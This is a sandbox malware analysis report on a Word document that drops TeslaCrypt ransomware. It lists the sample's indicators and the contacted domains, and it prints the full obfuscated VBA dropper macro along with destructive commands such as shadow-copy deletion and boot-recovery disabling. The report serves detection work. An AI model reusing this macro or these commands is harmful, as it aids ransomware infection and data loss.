inventory_list_120570.doc
This report was generated from a file or URL submitted to this webservice on August 22nd 2016 05:33:45 (UTC) with the action script "Heavy Anti-Evasion".
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v5.00 © Hybrid Analysis
Incident Response
Risk Assessment
- Ransomware
  - Deletes volume snapshots (often used by Ransomware)
- Persistence
  - Disables startup repair
  - Injects into explorer
  - Spawns a lot of processes
  - Tries to suppress failures during boot (often used to hide system changes)
- Network Behavior
  - Contacts 3 domains
Indicators

Malicious Indicators 11

Anti-Detection/Stealthiness
- Tries to suppress failures during boot (often used to hide system changes)
  - details: Tries to suppress failures during boot "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
  - source: Monitored Target
  - relevance: 8/10
General
- Document spawns new processes
  - details: Document spawned a new process (macro present)
  - source: Indicator Combinations
  - relevance: 7/10
- The input sample dropped a file that was identified as malicious
  - details: 14/55 Antivirus vendors marked dropped file "glom.exe" as malicious (classified as "Trojan.TeslaCrypt" with 25% detection rate)
  - source: Binary File
  - relevance: 10/10
Installation/Persistence
- Disables startup repair
  - details: Disables startup repair "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no"
  - source: Monitored Target
  - relevance: 8/10
- Injects into explorer
  - details: Injected into "explorer.exe"
  - source: Monitored Target
  - relevance: 5/10
Ransomware/Banking
- Deletes volume snapshots (often used by Ransomware)
  - details: Deletes volume snapshot files "vssadmin.exe" with commandline "delete shadows /all /quiet"
  - source: Monitored Target
  - relevance: 10/10
System Destruction
- Deletes volume snapshots (often used by Ransomware)
  - details: Deletes volume snapshot files "vssadmin.exe" with commandline "delete shadows /all /quiet"
  - source: Monitored Target
  - relevance: 10/10
Unusual Characteristics
- Contains embedded VBA macros with keywords that indicate auto-execute behavior
  - details: Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
  - source: Static Parser
  - relevance: 10/10
- Contains embedded string that indicates auto-execute behavior
  - details: Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
  - source: File/Memory
  - relevance: 10/10
- Spawns a lot of processes
  - details:
    - Spawned process "WINWORD.EXE" with commandline "/n "C:\bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.doc""
    - Spawned process "WmiPrvSE.exe" with commandline "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding"
    - Spawned process "glom.exe"
    - Spawned process "glom.exe"
    - Spawned process "explorer.exe"
    - Spawned process "vssadmin.exe" with commandline "delete shadows /all /quiet"
    - Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no"
    - Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
  - source: Monitored Target
  - relevance: 8/10

Hiding 1 Malicious Indicator (available only in the private webservice or standalone version)

Suspicious Indicators 12

Anti-Detection/Stealthiness
- Launches the WMI Provider Host
  - details: Found process "WmiPrvSE.exe" with commandline "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding"
  - source: Monitored Target
  - relevance: 10/10
Environment Awareness
- Possibly tries to implement anti-virtualization techniques
  - details: ";z7XZ?"Vx[#e F_dUVboXEdueyr[h@=#dS&^hob]!DPpF&^" (Indicator: "vbox")
  - source: File/Memory
  - relevance: 4/10
General
- Contains ability to find and load resources of a specific module
  - details:
    - FindResourceW@KERNEL32.DLL from glom.exe (PID: 3320)
    - FindResourceW@KERNEL32.DLL from glom.exe (PID: 3320)
  - source: Hybrid Analysis Technology
  - relevance: 1/10
Installation/Persistence
- Drops executable files
  - details: "glom.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  - source: Binary File
  - relevance: 10/10
- Touches files in the Windows directory
  - details:
    - "WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
    - "WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
    - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
    - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
    - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
    - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
    - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
    - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
    - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
    - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
    - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
    - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
    - "WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
    - "WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
    - "WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
    - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D83B4034-8653-45F7-A933-5CC9F33E7623}.tmp"
    - "WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
    - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A3794EE4-2ADA-4658-BE8E-94A45D0868B8}.tmp"
    - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BA66986F-A914-4DD3-B9E5-8173BEDC3BFE}.tmp"
  - source: API Call
  - relevance: 7/10
Remote Access Related
- Contains references to WMI/WMIC
  - details: "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding" (Indicator: "wmiprvse.exe")
  - source: File/Memory
  - relevance: 10/10
System Security
- Hooks API calls
  - details:
    - "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
    - "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
    - "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
    - "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
    - "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
  - source: Hook Detection
  - relevance: 10/10
Unusual Characteristics
- Contains embedded VBA macros with suspicious keywords
  - details:
    - Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings"
    - Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
    - Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
    - Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
    - Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
    - Found suspicious keyword "Environ" which indicates: "May read system environment variables"
    - Found suspicious keyword "Open" which indicates: "May open a file"
  - source: Static Parser
  - relevance: 10/10
- Contains embedded string with suspicious keywords
  - details:
    - Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
    - Found suspicious keyword "Open" which indicates: "May open a file"
    - Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
    - Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
    - Found suspicious keyword "Environ" which indicates: "May read system environment variables"
  - source: File/Memory
  - relevance: 10/10
- Installs hooks/patches the running process
  - details:
    - "WINWORD.EXE" wrote bytes "0883c40c" to virtual address "0x66C31F20" (part of module "VBE7.DLL")
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0baccd5900568dcf5ac66c3" to virtual address "0x0018A8CC"
    - "WINWORD.EXE" wrote bytes "e99a54f9f1" to virtual address "0x75813E59" ("SysFreeString@OLEAUT32.DLL")
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0ba2ce0140068dcf5ac66c3" to virtual address "0x058F98E4"
    - "WINWORD.EXE" wrote bytes "345888cc" to virtual address "0x66E59904" (part of module "RICHED20.DLL")
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0ba4cd5900568dcf5ac66c3" to virtual address "0x0018A88C"
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0baacdf140068dcf5ac66c3" to virtual address "0x058F98A4"
    - "WINWORD.EXE" wrote bytes "59a4285d" to virtual address "0x6A08F530" (part of module "WWLIB.DLL")
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0ba2cdf140068dcf5ac66c3" to virtual address "0x058F9864"
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0ba6cdf140068dcf5ac66c3" to virtual address "0x0018A84C"
    - "WINWORD.EXE" wrote bytes "e96033faf1" to virtual address "0x75814731" ("SysAllocStringByteLen@OLEAUT32.DLL")
    - "WINWORD.EXE" wrote bytes "da8e3ee9" to virtual address "0x66F610AC" (part of module "MSPTLS.DLL")
    - "WINWORD.EXE" wrote bytes "e9c53215f2" to virtual address "0x75C06143" ("OleLoadFromStream@OLE32.DLL")
    - "WINWORD.EXE" wrote bytes "e92399fcf1" to virtual address "0x75815DEE" ("VariantChangeType@OLEAUT32.DLL")
    - "WINWORD.EXE" wrote bytes "e99e487bf1" to virtual address "0x75FC3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0baccd6900568dcf5ac66c3" to virtual address "0x0018A94C"
    - "WINWORD.EXE" wrote bytes "771f205d" to virtual address "0x69D0CA70" (part of module "GFX.DLL")
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0ba4cd6900568dcf5ac66c3" to virtual address "0x0018A90C"
    - "WINWORD.EXE" wrote bytes "b811110000663d33c0baf4e28e0568dcf5ac66c3" to virtual address "0x0018A8EC"
    - "WINWORD.EXE" wrote bytes "b800000000663d33c0baecdf140068dcf5ac66c3" to virtual address "0x058F98C4"
  - source: Hook Detection
  - relevance: 10/10

Hiding 2 Suspicious Indicators (available only in the private webservice or standalone version)

Informative 11

Anti-Reverse Engineering
- Contains ability to register a top-level exception handler (often used as anti-debugging trick)
  - details:
    - SetUnhandledExceptionFilter@KERNEL32.DLL from glom.exe (PID: 3320)
    - SetUnhandledExceptionFilter@KERNEL32.DLL from glom.exe (PID: 3320)
    - SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003320
    - SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003320
    - SetUnhandledExceptionFilter@KERNEL32.DLL from glom.exe (PID: 3320)
    - SetUnhandledExceptionFilter@KERNEL32.DLL from glom.exe (PID: 3320)
    - SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003320
    - SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003320
  - source: Hybrid Analysis Technology
  - relevance: 1/10
Environment Awareness
- Contains ability to query machine time
  - details:
    - GetSystemTimeAsFileTime@KERNEL32.DLL from glom.exe (PID: 3320)
    - GetSystemTimeAsFileTime@KERNEL32.DLL from glom.exe (PID: 3320)
  - source: Hybrid Analysis Technology
  - relevance: 1/10
General
- Contacts domains
  - details:
    - "moatleftbet.com"
    - "heheckbitont.ru"
    - "meketusebet.ru"
  - source: Network Traffic
  - relevance: 1/10
- Contains embedded VBA macros
  - details:
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub cinnamon(lacrimatory)
Dim layout As Variant
Dim autobiographical As Variant
Dim plow As String
baize = tortured
bungler = LCase("hEr") & Left("itierareef", 6)
Close #lacrimatory
tortured = baize
End Sub
Function pauperize(achlamydeous) As String
Dim blasted As Long
Dim cotillion As Long
bentley = bentley - 413
Dim beware(63) As Long
Dim lorication() As Byte
Dim damon(63) As Long
Dim mercurius As Long
Dim gopherus(255) As Byte
Dim apiarist As String
tortured = tortured
Dim bah(63) As Long
Dim abysmal As Long
Dim ceremonious() As Byte
Dim sedation As Integer
gig = 255
candytuft = 64
devotional = 120 - 16 + 7 - 48
moke = 16515072
stultification = 16711680
flatness = 4032
gleefully = 11 - 22 + 65547
qurush = 80 + 75 - 116 + 217
squilla = 4096
sensible = 65280
syndicate = 262144
shaving = 258048
Dim scalar As Variant
Dim nerveracking() As Byte
nerveracking = StrConv(achlamydeous, vbFromUnicode)
Dim palaic As Byte
For embay = 0 To UBound(nerveracking)
nerveracking(embay) = nerveracking(embay) + 3 Xor 17
Next embay
recalcitration = 50
horizontality = 62
If recalcitration + horizontality < 97 Then
recalcitration = Left("dibiolets", 2) + Mid("lassidudescomfootboy", 10, 4) + LCase("MoDe")
pietism = Right("cryogenicsag", 2) + UCase("OStadero")
Else
horizontality = 88
End If
functionally = StrConv(nerveracking, vbUnicode)
sedation = 2
scup = 41 + 81
For cotillion = 0 To 255
Select Case cotillion
Case 65 To 90
gopherus(cotillion) = cotillion - 65
Case 97 To scup
gopherus(cotillion) = cotillion - 71
Case 48 To 57
gopherus(cotillion) = cotillion + 4
Case 43
gopherus(cotillion) = 62
Case 47
gopherus(cotillion) = 63
End Select
Next cotillion
For cotillion = 0 To 63
beware(cotillion) = cotillion * candytuft
bah(cotillion) = cotillion * squilla
damon(cotillion) = cotillion * syndicate
Next cotillion
lorication = StrConv(functionally, vbFromUnicode)
pasteurization = 4
ReDim ceremonious((((UBound(lorication) + 1) \ pasteurization) * 3) - 1)
For abysmal = 0 To UBound(lorication) Step 4
intuitively = lorication(abysmal)
dispassionately = 3
blasted = damon(gopherus(intuitively)) + bah(gopherus(lorication(abysmal + 1))) + _
beware(gopherus(lorication(abysmal + 2))) + gopherus(lorication(abysmal + dispassionately))
cotillion = blasted And stultification
ceremonious(mercurius) = cotillion \ gleefully
cotillion = blasted And sensible
ceremonious(mercurius + 1) = cotillion \ qurush
ceremonious(mercurius + 2) = blasted And gig
mercurius = mercurius + 3
Next abysmal
apiarist = StrConv(ceremonious, vbUnicode)
If sedation Then apiarist = Left$(apiarist, Len(apiarist) - sedation)
pauperize = apiarist
End Function
Public Sub AutoOpen()
Dim heliolatry As Integer
Dim beeline As Integer
fluted = fluted + 168
Dim backmost As Integer
Dim laisser As Variant
backmost = 7 Mod 23
tortured = tortured
If backmost < 98 - 82 - 337 Then
baize = "dorsum"
FormatMyTables
Else
Dim barbados As Byte
preparative.Scroll fmScrollActionNoChange, fmScrollActionEnd
jamboree = 68
dotard = 81
If jamboree + dotard < 15 Then
jamboree = Left("adboykinia", 2) + Right("amplyenoma", 5)
anxious = Right("enlistin", 2) + Mid("devotedoscuavuncular", 8, 4) + LCase("latE")
Else
dotard = 93
End If
End If
End Sub
Sub sempre()
dewdrops = Sin(66)
If dewdrops <> 90 Then
tortured = "markhor"
Dim aftertaste As New blueblack
aloes = "matsyendra"
bentley = bentley And 356
bentley = fluted \ 339
Else
fluted = fluted And 350
italy = Left("colpillage", 3) + Mid("mainlandlusionshudra", 9, 6)
prottagonist = UCase("ai") + Mid("brannyrstee", 7, 2)
inexpiable = "anhidrosis"
End If
oldest = Tan(33)
If oldest <> 96 Then
Dim cabinetmaker As String
cleave = aftertaste.giddyhead
baize = "methapyrilene"
Else
bentley = bentley + 86
hadrosauridae = "citizen"
academy = Mid("curiumafapparent", 7, 2) & LCase("FRAy")
End If
americanization = Tan(4)
If americanization <> 92 Then
Dim mesolithic As String
cabinetmaker = cleave + Mid("migratory\glindiana", 10, 3) & "om.exe"
fluted = bentley And 497
Else
bentley = bentley / 329
tracheostomy = "bigeneric"
depilous = StrReverse("oc") + Mid("hedgedntemburhinidae", 7, 4) + UCase("Pt")
diamond = "sieve"
End If
friendliness = Atn(62)
If friendliness <> 99 Then
emesis = "anal"
nineties = FreeFile
tortured = baize
anaphrodisia = 55 - 55
tortured = "adduction"
Else
baize = "coif"
racily = "mephobarbital"
gloire = UCase("fE") & LCase("nnIC")
santiago = "payment"
End If
angularness = Cos(98)
If angularness <> 78 Then
baize = tortured
fescennine = anaphrodisia
bentley = bentley And 470
Else
fluted = bentley / 303
saepe = Mid("heartrendingohafterthought", 13, 2) + "ioan"
r = Left("chsongwriter", 2) + StrReverse("sevi")
cashew = "red" & StrReverse("otdnuo")
End If
bethel = Sin(50)
If bethel <> 86 Then
aftertaste.centerline cabinetmaker, nineties
counterfactual = preparative.kachcha
tortured = baize
baize = tortured
Else
fluted = bentley - 71
bewilderingly = "polypedates"
meronym = StrReverse("lc") & "audi" & Left("anuscounsel", 4)
tout = Left("frbroadening", 2) + UCase("yeR")
End If
conductivity = Sin(42)
If conductivity <> 77 Then
thrips = counterfactual
baize = "betrim"
envious = ThisDocument.pauperize(thrips)
tortured = "junoesque"
Else
fluted = fluted And 151
catty = LCase("pER") & Right("pamperingmanen", 5) & StrReverse("ylt")
corpulence = "agrobiologic"
End If
quahaug = Tan(41)
If quahaug <> 87 Then
animalism = LCase("hO") & Mid("roguecuspmainland", 6, 4) & Right("agamemnonocus", 4)
scintillant = LCase("DE") & StrReverse("rek")
unsaid = LCase("GR") & UCase("AnDL") & StrReverse("y")
bentley = fluted - 490
Else
tortured = tortured
crucifixion = "euglenophyta"
banal = LCase("fi") & LCase("R")
End If
sazerac = Sin(34)
If sazerac <> 84 Then
Dim affinal As String
fluted = fluted / 130
fluted = bentley \ 103
pensiveness = Len(envious)
baize = "arches"
Else
bentley = bentley + 397
bc = "eether"
quaff = "germane"
End If
betoken = Atn(12)
If betoken <> 97 Then
fluted = bentley * 4
aftertaste.graceful envious, fescennine, nineties
baize = tortured
tortured = "thievishness"
Else
fluted = fluted And 320
decarbonized = "concessional"
reproduction = "discontinue"
unicorn = Mid("acriddifmodillion", 6, 3) + Right("gynecologyfiden", 5) + StrReverse("ec")
End If
thevetia = Sin(88)
If thevetia <> 88 Then
roughdried = nineties
baize = "audacious"
tortured = baize
Else
baize = "emperor"
phocomelia = "anatomy"
effectively = Mid("ceriseirpsychology", 7, 2) & StrReverse("sitilcycodi")
End If
jetpropelled = Sin(91)
If jetpropelled <> 84 Then
ThisDocument.cinnamon roughdried
baize = tortured
bentley = bentley And 207
aftertaste.coincident cabinetmaker
bentley = fluted + 222
Else
tortured = "dogobah"
distractedly = "delawarean"
botch = "cordon"
increased = "glob"
End If
End Sub
Sub FormatMyTables()
Selection.Tables(1).Style = "Light Shading - Accent 4"
Selection.SelectRow
Selection.Style = ActiveDocument.Styles("Heading 2")
Selection.Tables(1).Select
Selection.Tables(1).AutoFitBehavior (wdAutoFitFixed)
Selection.Tables(1).Rows.Alignment = wdAlignRowCenter
Selection.Columns.PreferredWidthType = wdPreferredWidthPoints
Selection.Columns.PreferredWidth = InchesToPoints(0.6)
End Sub
Sub CommentsCollectionObject()
Dim MyText As String
Dim MyRange As Object
Set MyRange = ActiveDocument.Range
MyText = "<Replace this with your text>"
' Selection Example:
Selection.Comments.Add Range:=Selection.Range, Text:=MyText
' Range Example:
MyRange.Comments.Add Range:=Selection.Range, Text:=MyText
End Sub"
File "blueblack.cls" (Streampath: "Macros/VBA/blueblack") has code: "'Yeah, not where you're born and raised
'You thought you could, thought you could
Dim baize As String
'Yeah, now you're living on, living on
'You got me feeling some way
Dim tortured As String
'And made you go and change your ways
'Show me how you go on the floor
Dim bentley
'Show me how you go on the floor
'Yeah, not where you're born and raised
Dim fluted As Long
'Old fashion pass to give yourself away
'So give yourself away
Private pyramid As String
'All the sweet talks making you exhausted
'I can see it on your face, yeah, you lost it
Sub trac()
'Yeah, that's where you say you're from
'A Hollywood horror
Dim blnTrackChangesOn As Boolean
'Yeah, not where you're born and raised
'Was it worth it for the fame?
blnTrackChangesOn = ActiveDocument.TrackRevisions
'A Hollywood horror
'You thought you could, thought you could
ActiveDocument.TrackRevisions = False
'A Hollywood horror
'I can see it on your face, yeah, you lost it
ActiveDocument.TrackRevisions = blnTrackChangesOn
'The city that, city that went
'Show me how you go on the floor
End Sub
'A Hollywood horror
'A Hollywood horror
'Yeah, now you're walking on, walking on
'Show me how you go on the floor
'Show me how you go on the floor
'Yeah, now you're walking on, walking on
Public Property Get Name() As String
'Old fashion pass to give yourself away
'Yeah, that's where you say you're from
Name = pyramid
'Was it worth it for your name?
'Nothing but ash and broken glass
End Property
'I can see it on your face, yeah, you lost it
'A Hollywood horror
'What happened to the you who's stronger
'Show me how you go on the floor
Function beadyeyed(filiation)
'I can see it on your face, yeah, you lost it
'Everybody's saying you're a monster
Dim tisane As Byte
'Old fashion pass to give yourself away
'Hollywood, Hollywood
Dim apophysis As Long
'The city that, city that went
'You got me feeling some way
Dim grouping As Variant
'You got me feeling some way
'And made you go and change your ways
necklet = StrConv(filiation, 128)
'So I'll say this is the day you became
'You thought you could, thought you could
triglochin = "seymour"
'A Hollywood horror
'Nothing but ash and broken glass
astriction = "jar"
'Make it, but the city won
'What happened to the you who's stronger
contraceptive = "frostiness"
'I can see it on your face, yeah, you lost it
'And made you go and change your ways
chemakuan = "sagebrush"
'Was it worth it for the fame?
'Was it worth it for your name?
beadyeyed = necklet
'I can see it on your face, yeah, you lost it
'Show me how you go on the floor
End Function
'So give yourself away
'Nothing but pills and low income
Sub amphiboly(lazaretto, magh, crossbreed)
'You thought you could, thought you could
'A Hollywood horror
lazaretto.ExecMethod crossbreed, "Create", magh
'I can see it on your face, yeah, you lost it
'Everybody's saying you're a monster
End Sub
'Hollywood, Hollywood
'Yeah, now you're walking on, walking on
'Yeah, that's where you say you're from
'Was it worth it for your name?
Function coincident(erica)
'It looks like you became
'So I'll say this is the day you became
biomedical = Sqr(41)
'Old fashion pass to give yourself away
'So I'll say this is the day you became
If biomedical <> 90 Then
'It looks like you became
'I can see it on your face, yeah, you lost it
phantasy = "win" & LCase("mgmTS") & Right("comely:\\", 3)
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
baize = baize
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
bentley = bentley / 431
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
Else
'\xef\xbb\xbfHollywood, Hollywood
'All the sweet talks making you exhausted
baize = tortured
'Old fashion pass to give yourself away
'So give yourself away
'Make it, but the city won
'Nothing but ash and broken glass
killed = "nominal"
'Everybody's saying you're a monster
'So I'll say this is the day you became
airworthiness = "drypis"
'So give yourself away
'A Hollywood horror
Mac = "imbibe"
'Everybody's saying you're a monster
'The city that, city that went
End If
'The city that, city that went
'Yeah, now you're living on, living on
cancridae = Cos(53)
'It looks like you became
'Yeah, not where you're born and raised
If cancridae <> 100 Then
'So I'll say this is the day you became
'Old fashion pass to give yourself away
'All the sweet talks making you exhausted
'So give yourself away
debile = Right("fifty.\", 2) & LCase("r")
'Everybody's saying you're a monster
'Was it worth it for your name?
fluted = bentley - 172
'A Hollywood horror
'So I'll say this is the day you became
Else
'I can see it on your face, yeah, you lost it
'Show me how you go on the floor
fluted = fluted / 251
'So I'll say this is the day you became
'You got me feeling some way
'What happened to the you who's stronger
'You got me feeling some way
clusia = "polyneuritis"
'Your heart's all gone
'So I'll say this is the day you became
sprocket = "lovelorn"
'You thought you could, thought you could
'Was it worth it for your name?
End If
'So I'll say this is the day you became
'Make it, but the city won
nephew = Tan(67)
'Yeah, now you're living on, living on
'You got me feeling some way
If nephew <> 83 Then
'You got me feeling some way
'You got me feeling some way
excerpta = debile & UCase("oo") & StrReverse("ic\t") & Left("mv2despairingly", 3)
'The city that, city that went
'Was it worth it for your name?
baize = "ephestia"
'Make it, but the city won
'Make it, but the city won
Set asparagine = GetObject(phantasy + excerpta)
'So I'll say this is the day you became
'Was it worth it for the fame?
tortured = "aft"
'Nothing but ash and broken glass
'Nothing but ash and broken glass
bentley = fluted / 328
'Yeah, now you're living on, living on
'A Hollywood horror
Else
'Yeah, that's where you say you're from
'Old fashion pass to give yourself away
baize = "mud"
'Your heart's all gone
'The city that, city that went
'And made you go and change your ways
'Nothing but pills and low income
courser = "mezzorilevo"
'Show me how you go on the floor
'Your heart's all gone
morbid = "antimonopoly"
'The city that, city that went
'Old fashion pass to give yourself away
End If
'Yeah, now you're living on, living on
'Everybody's saying you're a monster
jurisdiction = Atn(23)
'Yeah, that's where you say you're from
'A Hollywood horror
If jurisdiction <> 99 Then
'So I'll say this is the day you became
'Everybody's saying you're a monster
tricksy = Mid("lethargicallyWin3bullwhack", 14, 4) + Mid("diocese2_Procehalfcaste", 8, 7) + Mid("expendedssalign", 9, 2)
'Old fashion pass to give yourself away
'You got me feeling some way
membranous = "selfsacrifice"
'Old fashion pass to give yourself away
'You thought you could, thought you could
alexandrite = "absolver"
'So give yourself away
'Everybody's saying you're a monster
baize = baize
'And made you go and change your ways
'You got me feeling some way
Else
'Everybody's saying you're a monster
'I can see it on your face, yeah, you lost it
tortured = tortured
'The city that, city that went
'A Hollywood horror
'You got me feeling some way
'What happened to the you who's stronger
abolitionism = "expressway"
'You thought you could, thought you could
'Was it worth it for the fame?
micron = Left("trshorthorn", 2) + LCase("anSi") + UCase("tiVe")
'Show me how you go on the floor
'Old fashion pass to give yourself away
End If
'Was it worth it for your name?
'So I'll say this is the day you became
confesses = Atn(87)
'What happened to the you who's stronger
'Was it worth it for the fame?
If confesses <> 80 Then
'You got me feeling some way
'Yeah, that's where you say you're from
acceptor = StrReverse("ta") + Right("blastocytetribu", 5) + LCase("tIOn")
'Nothing but ash and broken glass
'So give yourself away
Set allophone = asparagine.Get(tricksy)
'Nothing but ash and broken glass
'What happened to the you who's stronger
galore = "coin"
'Hollywood, Hollywood
'So I'll say this is the day you became
fluted = bentley + 325
'Old fashion pass to give yourself away
'Yeah, now you're walking on, walking on
Else
'Show me how you go on the floor
'Show me how you go on the floor
fluted = bentley And 305
'Yeah, that's where you say you're from
'Yeah, now you're living on, living on
'So give yourself away
'Make it, but the city won
manitoba = "ailanthus"
'Old fashion pass to give yourself away
'Nothing but ash and broken glass
dermatitis = "digladiation"
'It looks like you became
'You got me feeling some way
endermic = "priest"
'So I'll say this is the day you became
'Your heart's all gone
End If
'You got me feeling some way
'Was it worth it for the fame?
colaptes = Sin(38)
'Was it worth it for the fame?
'You thought you could, thought you could
If colaptes <> 83 Then
'Nothing but ash and broken glass
'You got me feeling some way
necessitous = "curricle"
'A Hollywood horror
'Old fashion pass to give yourself away
Set calomel = allophone.Methods_
'It looks like you became
'So I'll say this is the day you became
tortured = tortured
'What happened to the you who's stronger
'The city that, city that went
tortured = "cayenne"
'So give yourself away
'A Hollywood horror
Else
'All the sweet talks making you exhausted
'Yeah, now you're walking on, walking on
bentley = fluted And 498
'Yeah, that's where you say you're from
'Show me how you go on the floor
'Everybody's saying you're a monster
'A Hollywood horror
provost = "cadaverine"
'You got me feeling some way
'So I'll say this is the day you became
unliveried = UCase("gAL") & LCase("linagO")
'I can see it on your face, yeah, you lost it
'So give yourself away
fates = "bourdon"
'Show me how you go on the floor
'Hollywood, Hollywood
End If
'Yeah, now you're living on, living on
'What happened to the you who's stronger
disentagle = Cos(11)
'What happened to the you who's stronger
'What happened to the you who's stronger
If disentagle <> 86 Then
'All the sweet talks making you exhausted
'Yeah, that's where you say you're from
damnatory = Left("Crkarok", 2) + "eate"
'Your heart's all gone
'A Hollywood horror
Set assessment = calomel(damnatory).InParameters.Spawninstance_
'Was it worth it for the fame?
'So give yourself away
baize = baize
'Show me how you go on the floor
'Was it worth it for your name?
Else
'Make it, but the city won
'Yeah, now you're living on, living on
tortured = "ephemerid"
'You got me feeling some way
'You got me feeling some way
'So I'll say this is the day you became
'All the sweet talks making you exhausted
aphelion = "developmentally"
'Nothing but pills and low income
'Was it worth it for the fame?
selfsameness = "scotograph"
'What happened to the you who's stronger
'A Hollywood horror
End If
'Show me how you go on the floor
'Old fashion pass to give yourself away
Wrap = Cos(61)
'Yeah, now you're living on, living on
'Was it worth it for your name?
If Wrap <> 94 Then
'It looks like you became
'What happened to the you who's stronger
baize = "equanimity"
'Was it worth it for your name?
'Everybody's saying you're a monster
assessment.CommandLine = erica
'The city that, city that went
'Your heart's all gone
bentley = fluted / 158
'Yeah, that's where you say you're from
'So I'll say this is the day you became
Else
'Was it worth it for your name?
'And made you go and change your ways
bentley = fluted \ 73
'A Hollywood horror
'Show me how you go on the floor
'You got me feeling some way
'You got me feeling some way
assurgent = "saick"
'A Hollywood horror
'It looks like you became
atrichornithidae = "invocation"
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
End If
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
allegiant = Sqr(78)
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
If allegiant <> 88 Then
'\xef\xbb\xbfHollywood, Hollywood
'It looks like you became
unsightly = "postage"
'I can see it on your face, yeah, you lost it
'Yeah, that's where you say you're from
amphiboly asparagine, assessment, tricksy
'What happened to the you who's stronger
'I can see it on your face, yeah, you lost it
fluted = bentley - 211
'It looks like you became
'So give yourself away
Else
'The city that, city that went
'Yeah, not where you're born and raised
fluted = fluted / 67
'It looks like you became
'I can see it on your face, yeah, you lost it
'You got me feeling some way
'You thought you could, thought you could
peony = "bankrup"
'Hollywood, Hollywood
'A Hollywood horror
blocker = "interlingua"
'Yeah, now you're walking on, walking on
'Yeah, that's where you say you're from
End If
'A Hollywood horror
'You got me feeling some way
End Function
'All the sweet talks making you exhausted
'Make it, but the city won
Public Property Let Name(mountebank As String)
'Old fashion pass to give yourself away
'What happened to the you who's stronger
pyramid = mountebank
'Everybody's saying you're a monster
'Yeah, now you're walking on, walking on
End Property
'So I'll say this is the day you became
'Was it worth it for your name?
'So I'll say this is the day you became
'A Hollywood horror
